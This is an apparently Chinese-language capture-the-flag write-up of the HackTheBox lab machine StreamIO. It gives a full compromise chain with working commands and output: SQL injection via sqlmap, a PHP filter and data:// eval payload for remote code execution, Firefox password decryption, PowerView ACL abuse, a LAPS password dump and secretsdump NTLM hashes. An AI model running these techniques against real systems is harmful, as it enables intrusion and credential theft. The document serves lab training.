StreamIO - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/474
• 10.10.11.158

端口扫描

windows 域机器：

$ nmap -sC -sV 10.10.11.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 15:35 CST
Nmap scan report for 10.10.11.158
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-13 14:37:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-06-13T14:38:21+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-06-13T14:37:43
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.82 seconds

80

直接访问是IIS默认页面：

443 watch.streamIO.htb

证书里可以得到域名，加hosts后访问：

10.10.11.158 watch.streamIO.htb

443 streamIO.htb

streamIO.htb

sql注入

login存在注入,很费时间，最终得到hash，破解出来密码：

sqlmap -r login.txt --force-ssl

# 密码包括最后那两个点
yoshihide : 66boysandgirls..

admin

admin中本身有几个功能,fuzz参数可以发现debug：

https://streamio.htb/admin/?user=
https://streamio.htb/admin/?staff=
https://streamio.htb/admin/?movie=
https://streamio.htb/admin/?message=

SecLists/Fuzzing/fuzz-Bo0oM.txt

debug

debug那里可以使用php伪协议：

https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php

$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');

master

继续进行fuzz可以发现master.php,发现其中调用eval,根据代码分析构造请求，RCE:

data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7
system($_GET['cmd']);

POST
https://streamio.htb/admin/?debug=master.php&cmd=whoami

master.php

<h1>Movie managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

reverse shell

可以直接msf生成上线命令，方便后续操作：

portfwd 1433

前面已经得到数据库账号密码，转发端口：

portfwd add -l 1433 -p 1433 -r 127.0.0.1

$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');

backup

数据库可以发现streamio_backup,users表中可以获得nikk37用户密码，这是机器上有的账户：

1,nikk37                                            ,389d14cb8e4e9b94b137deb1caf0612a  

get_dem_girls2@yahoo.com

得到的hash直接在线解密，得到明文密码：

user flag

得到的账号密码登录，user flag

需要把stream.htb也加到hosts

10.10.11.158 watch.streamIO.htb streamIO.htb stream.htb

evil-winrm -i stream.htb -u nikk37 -p "get_dem_girls2@yahoo.com"

提权信息

firefox

机器上装有firefox，提取登录信息进行解密

• lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwords
  https://github.com/lclevy/firepwd

C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\


key4.db
logins.json

python3 firepwd/firepwd.py

decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

bloodhound

bloodhound收集信息，发现可以从JDgodd打到Administrator

bloodhound-python -u nikk37 -ns 10.10.11.158 -d streamio.htb -c All

提权

core staff

根据bloodhound的信息，JDgodd对core staff有WriteOwner权限，core staff有权限去获取laps密码，所以首先把JDgodd加到core staff组中：

upload PowerView.ps1
Import-Module .\PowerView.ps1

$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred

laps password

现在可以使用JDgodd去获取laps密码：

sudo apt install lapsdumper

lapsdumper -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
DC$:j50th8dNh2($Ae

# 也可以继续使用powershell
$Computers = Get-ADComputer -Credential $Cred -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

Name DnsHostName     ms-Mcs-AdmPwd  ms-Mcs-AdmPwdExpirationTime
---- -----------     -------------  ---------------------------
DC   DC.streamIO.htb j50th8dNh2($Ae          132997693606874315

root flag

得到的laps密码就是Administrator密码,flag在Martin桌面：

evil-winrm -i streamio.htb -u Administrator -p 'j50th8dNh2($Ae'

hash

impacket-secretsdump -just-dc-ntlm Administrator@10.10.11.158

Administrator:500:aad3b435b51404eeaad3b435b51404ee:45be1d36942e3eb589e8b0d372198f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:fac45a493cb064a17fabefae8d723613:::

参考资料

• lclevy/firepwd: firepwd.py, an open source tool to decrypt Mozilla protected passwords
  https://github.com/lclevy/firepwd
• StreamIO - HTB [Discussion] | BreachForums
  https://breached.co/Thread-StreamIO-HTB-Discussion
• HTB: StreamIO – Syn’s writeups
  https://synisl33t.com/2022/06/06/htb-streamio/